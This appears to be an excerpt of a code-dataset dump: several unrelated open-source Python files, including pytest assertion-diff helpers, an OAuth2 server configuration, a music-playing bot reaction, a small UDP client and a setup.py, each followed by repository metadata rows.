explanation = _compare_eq_dict(left, right, verbose)
if isiterable(left) and isiterable(right):
expl = _compare_eq_iterable(left, right, verbose)
if explanation is not None:
explanation.extend(expl)
else:
explanation = expl
elif op == 'not in':
if istext(left) and istext(right):
explanation = _notin_text(left, right, verbose)
except Exception:
explanation = [
u('(pytest_assertion plugin: representation of details failed. '
'Probably an object has a faulty __repr__.)'),
u(_pytest._code.ExceptionInfo())]
if not explanation:
return None
return [summary] + explanation
def _diff_text(left, right, verbose=False):
"""Return the explanation for the diff between text or bytes
Unless --verbose is used this will skip leading and trailing
characters which are identical to keep the diff minimal.
If the input are bytes they will be safely converted to text.
"""
from difflib import ndiff
explanation = []
if isinstance(left, py.builtin.bytes):
left = u(repr(left)[1:-1]).replace(r'\n', '\n')
if isinstance(right, py.builtin.bytes):
right = u(repr(right)[1:-1]).replace(r'\n', '\n')
if not verbose:
i = 0 # just in case left or right has zero length
for i in range(min(len(left), len(right))):
if left[i] != right[i]:
break
if i > 42:
i -= 10 # Provide some context
explanation = [u('Skipping %s identical leading '
'characters in diff, use -v to show') % i]
left = left[i:]
right = right[i:]
if len(left) == len(right):
for i in range(len(left)):
if left[-i] != right[-i]:
break
if i > 42:
i -= 10 # Provide some context
explanation += [u('Skipping %s identical trailing '
'characters in diff, use -v to show') % i]
left = left[:-i]
right = right[:-i]
keepends = True
explanation += [line.strip('\n')
for line in ndiff(left.splitlines(keepends),
right.splitlines(keepends))]
return explanation
def _compare_eq_iterable(left, right, verbose=False):
if not verbose:
return [u('Use -v to get the full diff')]
# dynamic import to speedup pytest
import difflib
try:
left_formatting = pprint.pformat(left).splitlines()
right_formatting = pprint.pformat(right).splitlines()
explanation = [u('Full diff:')]
except Exception:
# hack: PrettyPrinter.pformat() in python 2 fails when formatting items that can't be sorted(), ie, calling
# sorted() on a list would raise. See issue #718.
# As a workaround, the full diff is generated by using the repr() string of each item of each container.
left_formatting = sorted(repr(x) for x in left)
right_formatting = sorted(repr(x) for x in right)
explanation = [u('Full diff (fallback to calling repr on each item):')]
explanation.extend(line.strip() for line in difflib.ndiff(left_formatting, right_formatting))
return explanation
def _compare_eq_sequence(left, right, verbose=False):
explanation = []
for i in range(min(len(left), len(right))):
if left[i] != right[i]:
explanation += [u('At index %s diff: %r != %r')
% (i, left[i], right[i])]
break
if len(left) > len(right):
explanation += [u('Left contains more items, first extra item: %s')
% py.io.saferepr(left[len(right)],)]
elif len(left) < len(right):
explanation += [
u('Right contains more items, first extra item: %s') %
py.io.saferepr(right[len(left)],)]
return explanation
def _compare_eq_set(left, right, verbose=False):
explanation = []
diff_left = left - right
diff_right = right - left
if diff_left:
explanation.append(u('Extra items in the left set:'))
for item in diff_left:
explanation.append(py.io.saferepr(item))
if diff_right:
explanation.append(u('Extra items in the right set:'))
for item in diff_right:
explanation.append(py.io.saferepr(item))
return explanation
def _compare_eq_dict(left, right, verbose=False):
explanation = []
common = set(left).intersection(set(right))
same = dict((k, left[k]) for k in common if left[k] == right[k])
if same and not verbose:
explanation += [u('Omitting %s identical items, use -v to show') %
len(same)]
elif same:
explanation += [u('Common items:')]
explanation += pprint.pformat(same).splitlines()
diff = set(k for k in common if left[k] != right[k])
if diff:
explanation += [u('Differing items:')]
for k in diff:
explanation += [py.io.saferepr({k: left[k]}) + ' != ' +
py.io.saferepr({k: right[k]})]
extra_left = set(left) - set(right)
if extra_left:
explanation.append(u('Left contains more items:'))
explanation.extend(pprint.pformat(
dict((k, left[k]) for k in extra_left)).splitlines())
extra_right = set(right) - set(left)
if extra_right:
explanation.append(u('Right contains more items:'))
explanation.extend(pprint.pformat(
dict((k, right[k]) for k in extra_right)).splitlines())
return explanation
def _notin_text(term, text, verbose=False):
index = text.find(term)
head = text[:index]
tail = text[index+len(term):]
correct_text = head + tail
diff = _diff_text(correct_text, text, verbose)
newdiff = [u('%s is contained here:') % py.io.saferepr(term, maxsize=42)]
for line in diff:
if line.startswith(u('Skipping')):
continue
if line.startswith(u('- ')):
continue
if line.startswith(u('+ ')):
newdiff.append(u(' ') + line[2:])
else:
newdiff.append(line)
return newdiff
| 35.750831
| 115
| 0.582753
|
4a0a4f4954ed3b665e87e644cc89ffe9ab293989
| 1,491
|
py
|
Python
|
core/brain/play/song/reaction.py
|
vsilent/smarty-bot
|
963cba05433be14494ba339343c9903ccab3c37d
|
[
"MIT"
] | 1
|
2016-10-08T09:01:05.000Z
|
2016-10-08T09:01:05.000Z
|
core/brain/play/song/reaction.py
|
vsilent/smarty-bot
|
963cba05433be14494ba339343c9903ccab3c37d
|
[
"MIT"
] | 1
|
2019-09-24T09:56:52.000Z
|
2019-09-24T09:56:52.000Z
|
core/brain/play/song/reaction.py
|
vsilent/smarty-bot
|
963cba05433be14494ba339343c9903ccab3c37d
|
[
"MIT"
] | null | null | null |
import logging
#from core.output import say
from core.config.settings import logger, DEMO_MUSIC_DIR
import subprocess
import os, random
class Reaction:
"""class Reaction"""
def __str__(self):
return 'Reac'
@classmethod
def __init__(self, *args, **kwargs):
""" original request string """
logger.info(args)
logger.info(kwargs)
logger.info(kwargs.get('req_obj'))
self.request = kwargs.pop('req_obj')['request']
self.response = None
def continue_dialog(self):
""" False will stop current dialog after this reaction and start new from begining
otherwise will continue to store request
"""
return False
#def run(self, request):
#"""default method"""
#from core.output import say
#from core.config.settings import DEMO_MUSIC_DIR
#import logging
#say('OK')
#import os
#import subprocess
#logging.debug('Playing... %s ' % DEMO_MUSIC_DIR)
#os.system('mplayer ' + DEMO_MUSIC_DIR +'*.wav')
#return True
def run(self, request):
"""default method"""
file = DEMO_MUSIC_DIR + random.choice( os.listdir( DEMO_MUSIC_DIR ) )
logger.info('Playing... %s ' % file )
proc = subprocess.Popen(
[ "/usr/bin/mplayer", file ]
)
#stdoutdata, stderrdata = proc.communicate()
#logging.info('Start subprocess...%s', proc.pid)
return True
| 29.235294
| 90
| 0.599598
|
4a0a506a28def373c681dff69b71e82f5a737513
| 2,900
|
py
|
Python
|
app/oauth2/oauth2.py
|
yishan1331/heroku-yishan-paas
|
bd46bc8c067999b1dfb83b863b5ba64e76933d0a
|
[
"MIT"
] | null | null | null |
app/oauth2/oauth2.py
|
yishan1331/heroku-yishan-paas
|
bd46bc8c067999b1dfb83b863b5ba64e76933d0a
|
[
"MIT"
] | null | null | null |
app/oauth2/oauth2.py
|
yishan1331/heroku-yishan-paas
|
bd46bc8c067999b1dfb83b863b5ba64e76933d0a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
from authlib.integrations.flask_oauth2 import (
AuthorizationServer,
ResourceProtector,
)
#Yishan add
from authlib.integrations.sqla_oauth2 import (
create_query_client_func,
create_save_token_func,
create_revocation_endpoint,
create_bearer_token_validator,
update_client_secret_func
)
from authlib.oauth2.rfc6749 import grants
from authlib.oauth2.rfc7636 import CodeChallenge
import redis
# from .models import db,Yishan_dbRedis
from .models import OAuth2Client, OAuth2Token
require_oauth = ResourceProtector()
def config_oauth(app,dicConfig):
from sqlalchemy import MetaData
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.engine import create_engine
from app.modules import check_dbconnect_success
dbUri = 'mysql+pymysql://{}:{}@{}:{}/{}?charset=utf8mb4'.format( \
dicConfig.get("DBMYSQLUser_PaaS"), \
dicConfig.get("DBMYSQLPassword_PaaS"), \
dicConfig.get("DBMYSQLIp_PaaS"), \
dicConfig.get("DBMYSQLPort_PaaS"), \
dicConfig.get("DBMYSQLDbname_PaaS"))
engine = create_engine(dbUri,encoding='utf-8')
print "111111111111111"
metadata = MetaData(bind=engine)
print "222222222222222"
DbSession = scoped_session(sessionmaker(autocommit=False, \
autoflush=False, \
bind=engine))
print "333333333333333"
check_status,check_result = check_dbconnect_success(DbSession, "PaaS")
if check_status:
sess = DbSession()
POOL = redis.ConnectionPool(host=dicConfig.get("DBREDISIp_PaaS"),port=dicConfig.get("RedisPort_PaaS"),db=15,password=dicConfig.get("RedisPassword_PaaS"))
Yishan_dbRedis = redis.Redis(connection_pool=POOL)
#Yishan add
update_client_secret = update_client_secret_func(sess, OAuth2Client)
query_client = create_query_client_func(sess, OAuth2Client)
save_token = create_save_token_func(sess, OAuth2Token, OAuth2Client, Yishan_dbRedis)
authorization = AuthorizationServer(
query_client=query_client,
save_token=save_token,
update_client_secret=update_client_secret
)
authorization.init_app(app)
# support all grants
# authorization.register_grant(grants.ImplicitGrant)
authorization.register_grant(grants.ClientCredentialsGrant)
# support revocation
revocation_cls = create_revocation_endpoint(sess, OAuth2Token,Yishan_dbRedis)
authorization.register_endpoint(revocation_cls)
# protect resource
bearer_cls = create_bearer_token_validator(sess, OAuth2Token, OAuth2Client, Yishan_dbRedis)
require_oauth.register_token_validator(bearer_cls())
return sess,DbSession,engine,Yishan_dbRedis,authorization
| 37.662338
| 161
| 0.708966
|
4a0a506fad2c8d3aadee2ccae1728fb7d7d684a0
| 251
|
py
|
Python
|
test/udp/client.py
|
Folamh/atreoraigh
|
97a4fba51908df6aa2f3a34f934fce6ef1bc5dcc
|
[
"MIT"
] | null | null | null |
test/udp/client.py
|
Folamh/atreoraigh
|
97a4fba51908df6aa2f3a34f934fce6ef1bc5dcc
|
[
"MIT"
] | null | null | null |
test/udp/client.py
|
Folamh/atreoraigh
|
97a4fba51908df6aa2f3a34f934fce6ef1bc5dcc
|
[
"MIT"
] | null | null | null |
import socket
import sys
def main():
sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
sock.sendto(sys.argv[2].encode('utf-8'), ("", int(sys.argv[1])))
if __name__ == '__main__':
main()
| 20.916667
| 68
| 0.577689
|
4a0a5211136d1c2368021b84e12fc3bb04b5cb95
| 153
|
py
|
Python
|
src/icemac/ab/calexport/masterdata/menu.py
|
icemac/icemac.ab.calexport
|
ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c
|
[
"BSD-2-Clause"
] | null | null | null |
src/icemac/ab/calexport/masterdata/menu.py
|
icemac/icemac.ab.calexport
|
ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c
|
[
"BSD-2-Clause"
] | null | null | null |
src/icemac/ab/calexport/masterdata/menu.py
|
icemac/icemac.ab.calexport
|
ae16aa6d3c7f15b5bc386f135c018f9d552d8d5c
|
[
"BSD-2-Clause"
] | null | null | null |
import icemac.addressbook.browser.menus.menu
export_views = icemac.addressbook.browser.menus.menu.SelectMenuItemOn(
'edit-export-masterdata.html')
| 25.5
| 70
| 0.810458
|
4a0a52c2265381d4d7f544063527eed6533203cb
| 1,988
|
py
|
Python
|
setup.py
|
oesteban/pyregseg
|
16639a048a6990465d460bfce65623556b104e51
|
[
"MIT"
] | null | null | null |
setup.py
|
oesteban/pyregseg
|
16639a048a6990465d460bfce65623556b104e51
|
[
"MIT"
] | 2
|
2017-10-13T23:15:31.000Z
|
2017-10-13T23:17:01.000Z
|
setup.py
|
oesteban/pyregseg
|
16639a048a6990465d460bfce65623556b104e51
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: oesteban
# @Date: 2015-11-19 16:44:27
# @Last Modified by: oesteban
# @Last Modified time: 2017-10-13 15:08:22
""" regseg setup script """
from __future__ import print_function, division, absolute_import, unicode_literals
def main():
""" Install entry-point """
from sys import version_info
from setuptools import setup, find_packages
from regseg.__about__ import (
__version__,
__author__,
__email__,
__license__,
__description__,
__longdesc__,
__url__,
__download__,
PACKAGE_NAME,
CLASSIFIERS,
REQUIRES,
SETUP_REQUIRES,
LINKS_REQUIRES,
TESTS_REQUIRES,
EXTRA_REQUIRES,
)
package_data = {'regseg': ['data/*.json', 'data/*.txt']}
if version_info[0] < 3:
package_data = {key.encode(): [v.encode() for v in val]
for key, val in list(package_data.items())}
setup(
name=PACKAGE_NAME,
version=__version__,
description=__description__,
long_description=__longdesc__,
author=__author__,
author_email=__email__,
license=__license__,
maintainer_email=__email__,
classifiers=CLASSIFIERS,
# Dependencies handling
setup_requires=SETUP_REQUIRES,
install_requires=REQUIRES,
dependency_links=LINKS_REQUIRES,
tests_require=TESTS_REQUIRES,
extras_require=EXTRA_REQUIRES,
url=__url__,
download_url=__download__,
packages=find_packages(exclude=['*.tests']),
package_data=package_data,
entry_points={
'console_scripts': [], # format 'mriqc=mriqc.bin.mriqc_run:main'
},
scripts=[
'tools/extract_hcp.py',
'tools/run_evaluations.py',
'tools/run_phantoms.py'
],
zip_safe=False
)
if __name__ == "__main__":
main()
| 27.611111
| 82
| 0.60664
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.